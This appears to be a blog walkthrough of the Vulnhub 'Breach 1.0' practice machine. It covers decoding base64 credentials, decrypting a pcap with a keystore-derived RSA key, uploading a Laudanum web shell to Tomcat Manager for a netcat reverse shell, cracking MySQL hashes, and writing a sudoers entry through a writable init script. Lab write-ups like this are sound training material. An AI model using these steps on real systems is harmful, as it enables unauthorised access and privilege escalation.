Vulnhub – Breach 1.0 walkthrough

First let’s see what we got. I did a basic nmap scan:

nmap

It seems that an active IPS/IDS is present. I tried different nmap evasion techniques but those didn’t work, it said that all ports are filtered. I checked manually if port 80 is open or not than  I fired up Nikto, nothing interesting.

Capture

Let’s watch those images. Voila, a little hint:

hint1.PNG

Okay, check that source code. Found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or encoded string. I don’t know why, my first thought was that it is a base64 encoded string. I had to decode the string twice, and that gave me a username:password pair.

source_base64

Did some investigation and found a CMS portal called IMPRESSCMS (clicked on Employee portal on initech.html). Let’s see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in Inbox. Lets see the first:

keyfile

I downloaded the keyfile located at the root of the website, and found out that this is a java keystore file. Read the 2 other messages but those didn’t help me too much. My first thought was proved itself, an active IDS/IPS is present. I searched for exploits related to impresscms but the one that could work were being trolled:

troll.gif

At this point I got stucked a bit. Tried dirbuster, different exploits, XSS vulnerabilities on CMS site but nothing. Tried to brute force the admin account, but no luck. Investigated the other pictures and sites deeper, nothing interesting. One option left on CMS site, check pgibbons profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

Opened the pcap file, it contained data but I didn’t have a private rsa key to decrypt. WAIT! I have one! I had to export the RSA private key from .keyfile and then I was able to look what the heck happened:

pcapcreds

Tomcat Manager running at port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/ | login successful with wireshark credentials). What more the wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where it is? It has been uploaded but the resource cannot be found,  the author or a system service may deleted it. A little  googling helped me at this part. I can upload any kind of war files and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my kali box.

cmd_warcommands_with_jsp

netcat

First I tried to exploit some Ubuntu 14.04 based kernel exploits but all of them failed. Finally gave up probing exploits, instead I sent LinEnum priv checker to the victim machine and did a quick investigation what permissions do I have.

MySQL login was successful without password with username root. Nice. I found Milton’s username and password hash in the database then tried to crack the password with oclHashcat. It was successfully recovered, I tried to change my user from tomcat to milton. It was successful. Another username and password was found but I can’t crack this hash within a reasonable time.

mysql.PNG

After that changing user from tomcat to milton find a “some_script.sh” file with following content: Nothing here.

Okay dig deeper. Really. Nothing in here…. After some time I found an init script in init.d folder(portly.sh). This little script redirect all traffic to portly scanner. Okay I will use this script to add milton into sudoers group at system startup.

echo “echo “milton ALL=(ALL) ALL” > /etc/sudoers” > /etc/init.d/portly.sh

After system reboot I rebuild my connections, did a quick sudo su with milton and voila, I captured the flag.

breach.PNG

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s